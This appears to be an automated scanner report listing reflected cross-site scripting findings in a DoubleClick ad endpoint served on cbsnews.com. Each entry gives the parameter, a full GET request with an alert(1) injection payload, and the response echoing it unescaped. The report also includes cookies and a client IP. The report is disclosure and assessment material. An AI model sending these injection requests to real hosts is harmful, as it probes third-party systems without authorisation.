HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=56f8d"-alert(1)-"1d00a0e4e7e&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var w
...[SNIP]...

3.94. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18f6d"-alert(1)-"51b7a82ca5c was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=18f6d"-alert(1)-"51b7a82ca5c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5755
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:49 GMT
Expires: Wed, 27 Apr 2011 23:22:49 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=18f6d"-alert(1)-"51b7a82ca5chttp://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH =
...[SNIP]...

3.95. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae410"-alert(1)-"76768d80340 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cnae410"-alert(1)-"76768d80340&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5764

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/3af6/17/160/%2a/r%3B234979442%3B0-0%3B0%3B57848298%3B4307-300/250%3B38213956/38231713/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cnae410"-alert(1)-"76768d80340&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243
...[SNIP]...

3.96. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d8a3"-alert(1)-"87b5e52dc7f was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US9d8a3"-alert(1)-"87b5e52dc7f&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5764

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
d%3B234979442%3B1-0%3B0%3B57848298%3B4307-300/250%3B38213964/38231721/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US9d8a3"-alert(1)-"87b5e52dc7f&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760
...[SNIP]...

3.97. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23571"-alert(1)-"929e9d3e54f was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=10023571"-alert(1)-"929e9d3e54f&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=10023571"-alert(1)-"929e9d3e54f&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.2
...[SNIP]...

3.98. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af8af"-alert(1)-"f718173ff91 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253aaf8af"-alert(1)-"f718173ff91&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3Dv8/3af6/17/160/%2a/i%3B234979442%3B2-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253aaf8af"-alert(1)-"f718173ff91&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.21
...[SNIP]...

3.99. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebd9b"-alert(1)-"c91cb2fcc46 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=ebd9b"-alert(1)-"c91cb2fcc46&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=ebd9b"-alert(1)-"c91cb2fcc46&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.htm
...[SNIP]...

3.100. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 187a9"-alert(1)-"5e0ae5f8a64 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com187a9"-alert(1)-"5e0ae5f8a64&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
bs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com187a9"-alert(1)-"5e0ae5f8a64&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-
...[SNIP]...

3.101. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77abb"-alert(1)-"9e34f2ad84d was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=277abb"-alert(1)-"9e34f2ad84d&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
6/17/160/%2a/i%3B234979442%3B2-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=277abb"-alert(1)-"9e34f2ad84d&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=
...[SNIP]...

3.102. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pdom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abcf"-alert(1)-"07297bb7caf was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com3abcf"-alert(1)-"07297bb7caf&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
g/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com3abcf"-alert(1)-"07297bb7caf&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same
...[SNIP]...

3.103. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eb5f"-alert(1)-"0a4a4487f8 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=13039462327604510206412523eb5f"-alert(1)-"0a4a4487f8&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
